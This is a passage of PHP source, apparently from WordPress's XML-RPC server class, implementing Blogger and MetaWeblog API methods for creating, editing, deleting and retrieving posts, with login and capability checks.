}
/**
* Deprecated.
*
* @since 1.5.0
* @deprecated 3.5.0
*
* @param array $args Unused.
* @return IXR_Error Error object.
*/
public function blogger_setTemplate( $args ) {
return new IXR_Error( 403, __( 'Sorry, this method is not supported.' ) );
}
/**
* Creates a new post.
*
* @since 1.5.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type string $0 App key (unused).
* @type int $1 Blog ID (unused).
* @type string $2 Username.
* @type string $3 Password.
* @type string $4 Content.
* @type int $5 Publish flag. 0 for draft, 1 for publish.
* }
* @return int|IXR_Error
*/
public function blogger_newPost( $args ) {
$this->escape( $args );
$username = $args[2];
$password = $args[3];
$content = $args[4];
$publish = $args[5];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'blogger.newPost', $args, $this );
$cap = ( $publish ) ? 'publish_posts' : 'edit_posts';
if ( ! current_user_can( get_post_type_object( 'post' )->cap->create_posts ) || ! current_user_can( $cap ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to post on this site.' ) );
}
$post_status = ( $publish ) ? 'publish' : 'draft';
$post_author = $user->ID;
$post_title = xmlrpc_getposttitle( $content );
$post_category = xmlrpc_getpostcategory( $content );
$post_content = xmlrpc_removepostdata( $content );
$post_date = current_time( 'mysql' );
$post_date_gmt = current_time( 'mysql', true );
$post_data = compact(
'post_author',
'post_date',
'post_date_gmt',
'post_content',
'post_title',
'post_category',
'post_status'
);
$post_id = wp_insert_post( $post_data );
if ( is_wp_error( $post_id ) ) {
return new IXR_Error( 500, $post_id->get_error_message() );
}
if ( ! $post_id ) {
return new IXR_Error( 500, __( 'Sorry, the post could not be created.' ) );
}
$this->attach_uploads( $post_id, $post_content );
/**
* Fires after a new post has been successfully created via the XML-RPC Blogger API.
*
* @since 3.4.0
*
* @param int $post_id ID of the new post.
* @param array $args An array of new post arguments.
*/
do_action( 'xmlrpc_call_success_blogger_newPost', $post_id, $args ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.NotLowercase
return $post_id;
}
/**
* Edits a post.
*
* @since 1.5.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type int $1 Post ID.
* @type string $2 Username.
* @type string $3 Password.
* @type string $4 Content
* @type int $5 Publish flag. 0 for draft, 1 for publish.
* }
* @return true|IXR_Error true when done.
*/
public function blogger_editPost( $args ) {
$this->escape( $args );
$post_id = (int) $args[1];
$username = $args[2];
$password = $args[3];
$content = $args[4];
$publish = $args[5];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'blogger.editPost', $args, $this );
$actual_post = get_post( $post_id, ARRAY_A );
if ( ! $actual_post || 'post' !== $actual_post['post_type'] ) {
return new IXR_Error( 404, __( 'Sorry, no such post.' ) );
}
$this->escape( $actual_post );
if ( ! current_user_can( 'edit_post', $post_id ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to edit this post.' ) );
}
if ( 'publish' === $actual_post['post_status'] && ! current_user_can( 'publish_posts' ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to publish this post.' ) );
}
$postdata = array();
$postdata['ID'] = $actual_post['ID'];
$postdata['post_content'] = xmlrpc_removepostdata( $content );
$postdata['post_title'] = xmlrpc_getposttitle( $content );
$postdata['post_category'] = xmlrpc_getpostcategory( $content );
$postdata['post_status'] = $actual_post['post_status'];
$postdata['post_excerpt'] = $actual_post['post_excerpt'];
$postdata['post_status'] = $publish ? 'publish' : 'draft';
$result = wp_update_post( $postdata );
if ( ! $result ) {
return new IXR_Error( 500, __( 'Sorry, the post could not be updated.' ) );
}
$this->attach_uploads( $actual_post['ID'], $postdata['post_content'] );
/**
* Fires after a post has been successfully updated via the XML-RPC Blogger API.
*
* @since 3.4.0
*
* @param int $post_id ID of the updated post.
* @param array $args An array of arguments for the post to edit.
*/
do_action( 'xmlrpc_call_success_blogger_editPost', $post_id, $args ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.NotLowercase
return true;
}
/**
* Deletes a post.
*
* @since 1.5.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type int $1 Post ID.
* @type string $2 Username.
* @type string $3 Password.
* }
* @return true|IXR_Error True when post is deleted.
*/
public function blogger_deletePost( $args ) {
$this->escape( $args );
$post_id = (int) $args[1];
$username = $args[2];
$password = $args[3];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'blogger.deletePost', $args, $this );
$actual_post = get_post( $post_id, ARRAY_A );
if ( ! $actual_post || 'post' !== $actual_post['post_type'] ) {
return new IXR_Error( 404, __( 'Sorry, no such post.' ) );
}
if ( ! current_user_can( 'delete_post', $post_id ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to delete this post.' ) );
}
$result = wp_delete_post( $post_id );
if ( ! $result ) {
return new IXR_Error( 500, __( 'Sorry, the post could not be deleted.' ) );
}
/**
* Fires after a post has been successfully deleted via the XML-RPC Blogger API.
*
* @since 3.4.0
*
* @param int $post_id ID of the deleted post.
* @param array $args An array of arguments to delete the post.
*/
do_action( 'xmlrpc_call_success_blogger_deletePost', $post_id, $args ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.NotLowercase
return true;
}
/*
* MetaWeblog API functions.
* Specs on wherever Dave Winer wants them to be.
*/
/**
* Creates a new post.
*
* The 'content_struct' argument must contain:
* - title
* - description
* - mt_excerpt
* - mt_text_more
* - mt_keywords
* - mt_tb_ping_urls
* - categories
*
* Also, it can optionally contain:
* - wp_slug
* - wp_password
* - wp_page_parent_id
* - wp_page_order
* - wp_author_id
* - post_status | page_status - can be 'draft', 'private', 'publish', or 'pending'
* - mt_allow_comments - can be 'open' or 'closed'
* - mt_allow_pings - can be 'open' or 'closed'
* - date_created_gmt
* - dateCreated
* - wp_post_thumbnail
*
* @since 1.5.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type array $3 Content structure.
* @type int $4 Optional. Publish flag. 0 for draft, 1 for publish. Default 0.
* }
* @return int|IXR_Error
*/
public function mw_newPost( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$content_struct = $args[3];
$publish = isset( $args[4] ) ? $args[4] : 0;
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'metaWeblog.newPost', $args, $this );
$page_template = '';
if ( ! empty( $content_struct['post_type'] ) ) {
if ( 'page' === $content_struct['post_type'] ) {
if ( $publish ) {
$cap = 'publish_pages';
} elseif ( isset( $content_struct['page_status'] ) && 'publish' === $content_struct['page_status'] ) {
$cap = 'publish_pages';
} else {
$cap = 'edit_pages';
}
$error_message = __( 'Sorry, you are not allowed to publish pages on this site.' );
$post_type = 'page';
if ( ! empty( $content_struct['wp_page_template'] ) ) {
$page_template = $content_struct['wp_page_template'];
}
} elseif ( 'post' === $content_struct['post_type'] ) {
if ( $publish ) {
$cap = 'publish_posts';
} elseif ( isset( $content_struct['post_status'] ) && 'publish' === $content_struct['post_status'] ) {
$cap = 'publish_posts';
} else {
$cap = 'edit_posts';
}
$error_message = __( 'Sorry, you are not allowed to publish posts on this site.' );
$post_type = 'post';
} else {
// No other 'post_type' values are allowed here.
return new IXR_Error( 401, __( 'Invalid post type.' ) );
}
} else {
if ( $publish ) {
$cap = 'publish_posts';
} elseif ( isset( $content_struct['post_status'] ) && 'publish' === $content_struct['post_status'] ) {
$cap = 'publish_posts';
} else {
$cap = 'edit_posts';
}
$error_message = __( 'Sorry, you are not allowed to publish posts on this site.' );
$post_type = 'post';
}
if ( ! current_user_can( get_post_type_object( $post_type )->cap->create_posts ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to publish posts on this site.' ) );
}
if ( ! current_user_can( $cap ) ) {
return new IXR_Error( 401, $error_message );
}
// Check for a valid post format if one was given.
if ( isset( $content_struct['wp_post_format'] ) ) {
$content_struct['wp_post_format'] = sanitize_key( $content_struct['wp_post_format'] );
if ( ! array_key_exists( $content_struct['wp_post_format'], get_post_format_strings() ) ) {
return new IXR_Error( 404, __( 'Invalid post format.' ) );
}
}
// Let WordPress generate the 'post_name' (slug) unless
// one has been provided.
$post_name = null;
if ( isset( $content_struct['wp_slug'] ) ) {
$post_name = $content_struct['wp_slug'];
}
// Only use a password if one was given.
$post_password = '';
if ( isset( $content_struct['wp_password'] ) ) {
$post_password = $content_struct['wp_password'];
}
// Only set a post parent if one was given.
$post_parent = 0;
if ( isset( $content_struct['wp_page_parent_id'] ) ) {
$post_parent = $content_struct['wp_page_parent_id'];
}
// Only set the 'menu_order' if it was given.
$menu_order = 0;
if ( isset( $content_struct['wp_page_order'] ) ) {
$menu_order = $content_struct['wp_page_order'];
}
$post_author = $user->ID;
// If an author ID was provided then use it instead.
if ( isset( $content_struct['wp_author_id'] ) && ( $user->ID !== (int) $content_struct['wp_author_id'] ) ) {
switch ( $post_type ) {
case 'post':
if ( ! current_user_can( 'edit_others_posts' ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to create posts as this user.' ) );
}
break;
case 'page':
if ( ! current_user_can( 'edit_others_pages' ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to create pages as this user.' ) );
}
break;
default:
return new IXR_Error( 401, __( 'Invalid post type.' ) );
}
$author = get_userdata( $content_struct['wp_author_id'] );
if ( ! $author ) {
return new IXR_Error( 404, __( 'Invalid author ID.' ) );
}
$post_author = $content_struct['wp_author_id'];
}
$post_title = isset( $content_struct['title'] ) ? $content_struct['title'] : '';
$post_content = isset( $content_struct['description'] ) ? $content_struct['description'] : '';
$post_status = $publish ? 'publish' : 'draft';
if ( isset( $content_struct[ "{$post_type}_status" ] ) ) {
switch ( $content_struct[ "{$post_type}_status" ] ) {
case 'draft':
case 'pending':
case 'private':
case 'publish':
$post_status = $content_struct[ "{$post_type}_status" ];
break;
default:
// Deliberably left empty.
break;
}
}
$post_excerpt = isset( $content_struct['mt_excerpt'] ) ? $content_struct['mt_excerpt'] : '';
$post_more = isset( $content_struct['mt_text_more'] ) ? $content_struct['mt_text_more'] : '';
$tags_input = isset( $content_struct['mt_keywords'] ) ? $content_struct['mt_keywords'] : array();
if ( isset( $content_struct['mt_allow_comments'] ) ) {
if ( ! is_numeric( $content_struct['mt_allow_comments'] ) ) {
switch ( $content_struct['mt_allow_comments'] ) {
case 'closed':
$comment_status = 'closed';
break;
case 'open':
$comment_status = 'open';
break;
default:
$comment_status = get_default_comment_status( $post_type );
break;
}
} else {
switch ( (int) $content_struct['mt_allow_comments'] ) {
case 0:
case 2:
$comment_status = 'closed';
break;
case 1:
$comment_status = 'open';
break;
default:
$comment_status = get_default_comment_status( $post_type );
break;
}
}
} else {
$comment_status = get_default_comment_status( $post_type );
}
if ( isset( $content_struct['mt_allow_pings'] ) ) {
if ( ! is_numeric( $content_struct['mt_allow_pings'] ) ) {
switch ( $content_struct['mt_allow_pings'] ) {
case 'closed':
$ping_status = 'closed';
break;
case 'open':
$ping_status = 'open';
break;
default:
$ping_status = get_default_comment_status( $post_type, 'pingback' );
break;
}
} else {
switch ( (int) $content_struct['mt_allow_pings'] ) {
case 0:
$ping_status = 'closed';
break;
case 1:
$ping_status = 'open';
break;
default:
$ping_status = get_default_comment_status( $post_type, 'pingback' );
break;
}
}
} else {
$ping_status = get_default_comment_status( $post_type, 'pingback' );
}
if ( $post_more ) {
$post_content .= '<!--more-->' . $post_more;
}
$to_ping = '';
if ( isset( $content_struct['mt_tb_ping_urls'] ) ) {
$to_ping = $content_struct['mt_tb_ping_urls'];
if ( is_array( $to_ping ) ) {
$to_ping = implode( ' ', $to_ping );
}
}
// Do some timestamp voodoo.
if ( ! empty( $content_struct['date_created_gmt'] ) ) {
// We know this is supposed to be GMT, so we're going to slap that Z on there by force.
$date_created = rtrim( $content_struct['date_created_gmt']->getIso(), 'Z' ) . 'Z';
} elseif ( ! empty( $content_struct['dateCreated'] ) ) {
$date_created = $content_struct['dateCreated']->getIso();
}
$post_date = '';
$post_date_gmt = '';
if ( ! empty( $date_created ) ) {
$post_date = iso8601_to_datetime( $date_created );
$post_date_gmt = iso8601_to_datetime( $date_created, 'gmt' );
}
$post_category = array();
if ( isset( $content_struct['categories'] ) ) {
$catnames = $content_struct['categories'];
if ( is_array( $catnames ) ) {
foreach ( $catnames as $cat ) {
$post_category[] = get_cat_ID( $cat );
}
}
}
$postdata = compact(
'post_author',
'post_date',
'post_date_gmt',
'post_content',
'post_title',
'post_category',
'post_status',
'post_excerpt',
'comment_status',
'ping_status',
'to_ping',
'post_type',
'post_name',
'post_password',
'post_parent',
'menu_order',
'tags_input',
'page_template'
);
$post_id = get_default_post_to_edit( $post_type, true )->ID;
$postdata['ID'] = $post_id;
// Only posts can be sticky.
if ( 'post' === $post_type && isset( $content_struct['sticky'] ) ) {
$data = $postdata;
$data['sticky'] = $content_struct['sticky'];
$error = $this->_toggle_sticky( $data );
if ( $error ) {
return $error;
}
}
if ( isset( $content_struct['custom_fields'] ) ) {
$this->set_custom_fields( $post_id, $content_struct['custom_fields'] );
}
if ( isset( $content_struct['wp_post_thumbnail'] ) ) {
if ( set_post_thumbnail( $post_id, $content_struct['wp_post_thumbnail'] ) === false ) {
return new IXR_Error( 404, __( 'Invalid attachment ID.' ) );
}
unset( $content_struct['wp_post_thumbnail'] );
}
// Handle enclosures.
$enclosure = isset( $content_struct['enclosure'] ) ? $content_struct['enclosure'] : null;
$this->add_enclosure_if_new( $post_id, $enclosure );
$this->attach_uploads( $post_id, $post_content );
/*
* Handle post formats if assigned, value is validated earlier
* in this function.
*/
if ( isset( $content_struct['wp_post_format'] ) ) {
set_post_format( $post_id, $content_struct['wp_post_format'] );
}
$post_id = wp_insert_post( $postdata, true );
if ( is_wp_error( $post_id ) ) {
return new IXR_Error( 500, $post_id->get_error_message() );
}
if ( ! $post_id ) {
return new IXR_Error( 500, __( 'Sorry, the post could not be created.' ) );
}
/**
* Fires after a new post has been successfully created via the XML-RPC MovableType API.
*
* @since 3.4.0
*
* @param int $post_id ID of the new post.
* @param array $args An array of arguments to create the new post.
*/
do_action( 'xmlrpc_call_success_mw_newPost', $post_id, $args ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.NotLowercase
return (string) $post_id;
}
/**
* Adds an enclosure to a post if it's new.
*
* @since 2.8.0
*
* @param int $post_id Post ID.
* @param array $enclosure Enclosure data.
*/
public function add_enclosure_if_new( $post_id, $enclosure ) {
if ( is_array( $enclosure ) && isset( $enclosure['url'] ) && isset( $enclosure['length'] ) && isset( $enclosure['type'] ) ) {
$encstring = $enclosure['url'] . "\n" . $enclosure['length'] . "\n" . $enclosure['type'] . "\n";
$found = false;
$enclosures = get_post_meta( $post_id, 'enclosure' );
if ( $enclosures ) {
foreach ( $enclosures as $enc ) {
// This method used to omit the trailing new line. #23219
if ( rtrim( $enc, "\n" ) === rtrim( $encstring, "\n" ) ) {
$found = true;
break;
}
}
}
if ( ! $found ) {
add_post_meta( $post_id, 'enclosure', $encstring );
}
}
}
/**
* Attaches an upload to a post.
*
* @since 2.1.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param int $post_id Post ID.
* @param string $post_content Post Content for attachment.
*/
public function attach_uploads( $post_id, $post_content ) {
global $wpdb;
// Find any unattached files.
$attachments = $wpdb->get_results( "SELECT ID, guid FROM {$wpdb->posts} WHERE post_parent = '0' AND post_type = 'attachment'" );
if ( is_array( $attachments ) ) {
foreach ( $attachments as $file ) {
if ( ! empty( $file->guid ) && str_contains( $post_content, $file->guid ) ) {
$wpdb->update( $wpdb->posts, array( 'post_parent' => $post_id ), array( 'ID' => $file->ID ) );
}
}
}
}
/**
* Edits a post.
*
* @since 1.5.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Post ID.
* @type string $1 Username.
* @type string $2 Password.
* @type array $3 Content structure.
* @type int $4 Optional. Publish flag. 0 for draft, 1 for publish. Default 0.
* }
* @return true|IXR_Error True on success.
*/
public function mw_editPost( $args ) {
$this->escape( $args );
$post_id = (int) $args[0];
$username = $args[1];
$password = $args[2];
$content_struct = $args[3];
$publish = isset( $args[4] ) ? $args[4] : 0;
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'metaWeblog.editPost', $args, $this );
$postdata = get_post( $post_id, ARRAY_A );
/*
* If there is no post data for the give post ID, stop now and return an error.
* Otherwise a new post will be created (which was the old behavior).
*/
if ( ! $postdata || empty( $postdata['ID'] ) ) {
return new IXR_Error( 404, __( 'Invalid post ID.' ) );
}
if ( ! current_user_can( 'edit_post', $post_id ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to edit this post.' ) );
}
// Use wp.editPost to edit post types other than post and page.
if ( ! in_array( $postdata['post_type'], array( 'post', 'page' ), true ) ) {
return new IXR_Error( 401, __( 'Invalid post type.' ) );
}
// Thwart attempt to change the post type.
if ( ! empty( $content_struct['post_type'] ) && ( $content_struct['post_type'] !== $postdata['post_type'] ) ) {
return new IXR_Error( 401, __( 'The post type may not be changed.' ) );
}
// Check for a valid post format if one was given.
if ( isset( $content_struct['wp_post_format'] ) ) {
$content_struct['wp_post_format'] = sanitize_key( $content_struct['wp_post_format'] );
if ( ! array_key_exists( $content_struct['wp_post_format'], get_post_format_strings() ) ) {
return new IXR_Error( 404, __( 'Invalid post format.' ) );
}
}
$this->escape( $postdata );
$post_id = $postdata['ID'];
$post_content = $postdata['post_content'];
$post_title = $postdata['post_title'];
$post_excerpt = $postdata['post_excerpt'];
$post_password = $postdata['post_password'];
$post_parent = $postdata['post_parent'];
$post_type = $postdata['post_type'];
$menu_order = $postdata['menu_order'];
$ping_status = $postdata['ping_status'];
$comment_status = $postdata['comment_status'];
// Let WordPress manage slug if none was provided.
$post_name = $postdata['post_name'];
if ( isset( $content_struct['wp_slug'] ) ) {
$post_name = $content_struct['wp_slug'];
}
// Only use a password if one was given.
if ( isset( $content_struct['wp_password'] ) ) {
$post_password = $content_struct['wp_password'];
}
// Only set a post parent if one was given.
if ( isset( $content_struct['wp_page_parent_id'] ) ) {
$post_parent = $content_struct['wp_page_parent_id'];
}
// Only set the 'menu_order' if it was given.
if ( isset( $content_struct['wp_page_order'] ) ) {
$menu_order = $content_struct['wp_page_order'];
}
$page_template = '';
if ( ! empty( $content_struct['wp_page_template'] ) && 'page' === $post_type ) {
$page_template = $content_struct['wp_page_template'];
}
$post_author = $postdata['post_author'];
// If an author ID was provided then use it instead.
if ( isset( $content_struct['wp_author_id'] ) ) {
// Check permissions if attempting to switch author to or from another user.
if ( $user->ID !== (int) $content_struct['wp_author_id'] || $user->ID !== (int) $post_author ) {
switch ( $post_type ) {
case 'post':
if ( ! current_user_can( 'edit_others_posts' ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to change the post author as this user.' ) );
}
break;
case 'page':
if ( ! current_user_can( 'edit_others_pages' ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to change the page author as this user.' ) );
}
break;
default:
return new IXR_Error( 401, __( 'Invalid post type.' ) );
}
$post_author = $content_struct['wp_author_id'];
}
}
if ( isset( $content_struct['mt_allow_comments'] ) ) {
if ( ! is_numeric( $content_struct['mt_allow_comments'] ) ) {
switch ( $content_struct['mt_allow_comments'] ) {
case 'closed':
$comment_status = 'closed';
break;
case 'open':
$comment_status = 'open';
break;
default:
$comment_status = get_default_comment_status( $post_type );
break;
}
} else {
switch ( (int) $content_struct['mt_allow_comments'] ) {
case 0:
case 2:
$comment_status = 'closed';
break;
case 1:
$comment_status = 'open';
break;
default:
$comment_status = get_default_comment_status( $post_type );
break;
}
}
}
if ( isset( $content_struct['mt_allow_pings'] ) ) {
if ( ! is_numeric( $content_struct['mt_allow_pings'] ) ) {
switch ( $content_struct['mt_allow_pings'] ) {
case 'closed':
$ping_status = 'closed';
break;
case 'open':
$ping_status = 'open';
break;
default:
$ping_status = get_default_comment_status( $post_type, 'pingback' );
break;
}
} else {
switch ( (int) $content_struct['mt_allow_pings'] ) {
case 0:
$ping_status = 'closed';
break;
case 1:
$ping_status = 'open';
break;
default:
$ping_status = get_default_comment_status( $post_type, 'pingback' );
break;
}
}
}
if ( isset( $content_struct['title'] ) ) {
$post_title = $content_struct['title'];
}
if ( isset( $content_struct['description'] ) ) {
$post_content = $content_struct['description'];
}
$post_category = array();
if ( isset( $content_struct['categories'] ) ) {
$catnames = $content_struct['categories'];
if ( is_array( $catnames ) ) {
foreach ( $catnames as $cat ) {
$post_category[] = get_cat_ID( $cat );
}
}
}
if ( isset( $content_struct['mt_excerpt'] ) ) {
$post_excerpt = $content_struct['mt_excerpt'];
}
$post_more = isset( $content_struct['mt_text_more'] ) ? $content_struct['mt_text_more'] : '';
$post_status = $publish ? 'publish' : 'draft';
if ( isset( $content_struct[ "{$post_type}_status" ] ) ) {
switch ( $content_struct[ "{$post_type}_status" ] ) {
case 'draft':
case 'pending':
case 'private':
case 'publish':
$post_status = $content_struct[ "{$post_type}_status" ];
break;
default:
$post_status = $publish ? 'publish' : 'draft';
break;
}
}
$tags_input = isset( $content_struct['mt_keywords'] ) ? $content_struct['mt_keywords'] : array();
if ( 'publish' === $post_status || 'private' === $post_status ) {
if ( 'page' === $post_type && ! current_user_can( 'publish_pages' ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to publish this page.' ) );
} elseif ( ! current_user_can( 'publish_posts' ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to publish this post.' ) );
}
}
if ( $post_more ) {
$post_content = $post_content . '<!--more-->' . $post_more;
}
$to_ping = '';
if ( isset( $content_struct['mt_tb_ping_urls'] ) ) {
$to_ping = $content_struct['mt_tb_ping_urls'];
if ( is_array( $to_ping ) ) {
$to_ping = implode( ' ', $to_ping );
}
}
// Do some timestamp voodoo.
if ( ! empty( $content_struct['date_created_gmt'] ) ) {
// We know this is supposed to be GMT, so we're going to slap that Z on there by force.
$date_created = rtrim( $content_struct['date_created_gmt']->getIso(), 'Z' ) . 'Z';
} elseif ( ! empty( $content_struct['dateCreated'] ) ) {
$date_created = $content_struct['dateCreated']->getIso();
}
// Default to not flagging the post date to be edited unless it's intentional.
$edit_date = false;
if ( ! empty( $date_created ) ) {
$post_date = iso8601_to_datetime( $date_created );
$post_date_gmt = iso8601_to_datetime( $date_created, 'gmt' );
// Flag the post date to be edited.
$edit_date = true;
} else {
$post_date = $postdata['post_date'];
$post_date_gmt = $postdata['post_date_gmt'];
}
$newpost = array(
'ID' => $post_id,
);
$newpost += compact(
'post_content',
'post_title',
'post_category',
'post_status',
'post_excerpt',
'comment_status',
'ping_status',
'edit_date',
'post_date',
'post_date_gmt',
'to_ping',
'post_name',
'post_password',
'post_parent',
'menu_order',
'post_author',
'tags_input',
'page_template'
);
// We've got all the data -- post it.
$result = wp_update_post( $newpost, true );
if ( is_wp_error( $result ) ) {
return new IXR_Error( 500, $result->get_error_message() );
}
if ( ! $result ) {
return new IXR_Error( 500, __( 'Sorry, the post could not be updated.' ) );
}
// Only posts can be sticky.
if ( 'post' === $post_type && isset( $content_struct['sticky'] ) ) {
$data = $newpost;
$data['sticky'] = $content_struct['sticky'];
$data['post_type'] = 'post';
$error = $this->_toggle_sticky( $data, true );
if ( $error ) {
return $error;
}
}
if ( isset( $content_struct['custom_fields'] ) ) {
$this->set_custom_fields( $post_id, $content_struct['custom_fields'] );
}
if ( isset( $content_struct['wp_post_thumbnail'] ) ) {
// Empty value deletes, non-empty value adds/updates.
if ( empty( $content_struct['wp_post_thumbnail'] ) ) {
delete_post_thumbnail( $post_id );
} else {
if ( set_post_thumbnail( $post_id, $content_struct['wp_post_thumbnail'] ) === false ) {
return new IXR_Error( 404, __( 'Invalid attachment ID.' ) );
}
}
unset( $content_struct['wp_post_thumbnail'] );
}
// Handle enclosures.
$enclosure = isset( $content_struct['enclosure'] ) ? $content_struct['enclosure'] : null;
$this->add_enclosure_if_new( $post_id, $enclosure );
$this->attach_uploads( $post_id, $post_content );
// Handle post formats if assigned, validation is handled earlier in this function.
if ( isset( $content_struct['wp_post_format'] ) ) {
set_post_format( $post_id, $content_struct['wp_post_format'] );
}
/**
* Fires after a post has been successfully updated via the XML-RPC MovableType API.
*
* @since 3.4.0
*
* @param int $post_id ID of the updated post.
* @param array $args An array of arguments to update the post.
*/
do_action( 'xmlrpc_call_success_mw_editPost', $post_id, $args ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.NotLowercase
return true;
}
/**
* Retrieves a post.
*
* @since 1.5.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Post ID.
* @type string $1 Username.
* @type string $2 Password.
* }
* @return array|IXR_Error
*/
public function mw_getPost( $args ) {
$this->escape( $args );
$post_id = (int) $args[0];
$username = $args[1];
$password = $args[2];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
$postdata = get_post( $post_id, ARRAY_A );
if ( ! $postdata ) {
return new IXR_Error( 404, __( 'Invalid post ID.' ) );
}
if ( ! current_user_can( 'edit_post', $post_id ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to edit this post.' ) );
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'metaWeblog.getPost', $args, $this );
if ( '' !== $postdata['post_date'] ) {
$post_date = $this->_convert_date( $postdata['post_date'] );
$post_date_gmt = $this->_convert_date_gmt( $postdata['post_date_gmt'], $postdata['post_date'] );
$post_modified = $this->_convert_date( $postdata['post_modified'] );
$post_modified_gmt = $this->_convert_date_gmt( $postdata['post_modified_gmt'], $postdata['post_modified'] );
$categories = array();
$cat_ids = wp_get_post_categories( $post_id );
foreach ( $cat_ids as $cat_id ) {
$categories[] = get_cat_name( $cat_id );
}
$tagnames = array();
$tags = wp_get_post_tags( $post_id );
if ( ! empty( $tags ) ) {
foreach ( $tags as $tag ) {
$tagnames[] = $tag->name;
}
$tagnames = implode( ', ', $tagnames );
} else {
$tagnames = '';
}
$post = get_extended( $postdata['post_content'] );
$link = get_permalink( $postdata['ID'] );
// Get the author info.
$author = get_userdata( $postdata['post_author'] );
$allow_comments = ( 'open' === $postdata['comment_status'] ) ? 1 : 0;
$allow_pings = ( 'open' === $postdata['ping_status'] ) ? 1 : 0;
// Consider future posts as published.
if ( 'future' === $postdata['post_status'] ) {
$postdata['post_status'] = 'publish';
}
// Get post format.
$post_format = get_post_format( $post_id );
if ( empty( $post_format ) ) {
$post_format = 'standard';
}
$sticky = false;
if ( is_sticky( $post_id ) ) {
$sticky = true;
}
$enclosure = array();
foreach ( (array) get_post_custom( $post_id ) as $key => $val ) {
if ( 'enclosure' === $key ) {
foreach ( (array) $val as $enc ) {
$encdata = explode( "\n", $enc );
$enclosure['url'] = trim( htmlspecialchars( $encdata[0] ) );
$enclosure['length'] = (int) trim( $encdata[1] );
$enclosure['type'] = trim( $encdata[2] );
break 2;
}
}
}
$resp = array(
'dateCreated' => $post_date,
'userid' => $postdata['post_author'],
'postid' => $postdata['ID'],
'description' => $post['main'],
'title' => $postdata['post_title'],
'link' => $link,
'permaLink' => $link,
// Commented out because no other tool seems to use this.
// 'content' => $entry['post_content'],
'categories' => $categories,
'mt_excerpt' => $postdata['post_excerpt'],
'mt_text_more' => $post['extended'],
'wp_more_text' => $post['more_text'],
'mt_allow_comments' => $allow_comments,
'mt_allow_pings' => $allow_pings,
'mt_keywords' => $tagnames,
'wp_slug' => $postdata['post_name'],
'wp_password' => $postdata['post_password'],
'wp_author_id' => (string) $author->ID,
'wp_author_display_name' => $author->display_name,
'date_created_gmt' => $post_date_gmt,
'post_status' => $postdata['post_status'],
'custom_fields' => $this->get_custom_fields( $post_id ),
'wp_post_format' => $post_format,
'sticky' => $sticky,
'date_modified' => $post_modified,
'date_modified_gmt' => $post_modified_gmt,
);
if ( ! empty( $enclosure ) ) {
$resp['enclosure'] = $enclosure;
}
$resp['wp_post_thumbnail'] = get_post_thumbnail_id( $postdata['ID'] );
return $resp;
} else {
return new IXR_Error( 404, __( 'Sorry, no such post.' ) );
}
}
/**
* Retrieves list of recent posts.
*
* @since 1.5.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type int $3 Optional. Number of posts.
* }
* @return array|IXR_Error
*/
public function mw_getRecentPosts( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
if ( isset( $args[3] ) ) {
$query = array( 'numberposts' => absint( $args[3] ) );
} else {
$query = array();
}
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
if ( ! current_user_can( 'edit_posts' ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to edit posts.' ) );
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'metaWeblog.getRecentPosts', $args, $this );
$posts_list = wp_get_recent_posts( $query );
if ( ! $posts_list ) {
return array();
}
$recent_posts = array();
foreach ( $posts_list as $entry ) {
if ( ! current_user_can( 'edit_post', $entry['ID'] ) ) {
continue;
}
$post_date = $this->_convert_date( $entry['post_date'] );
$post_date_gmt = $this->_convert_date_gmt( $entry['post_date_gmt'], $entry['post_date'] );
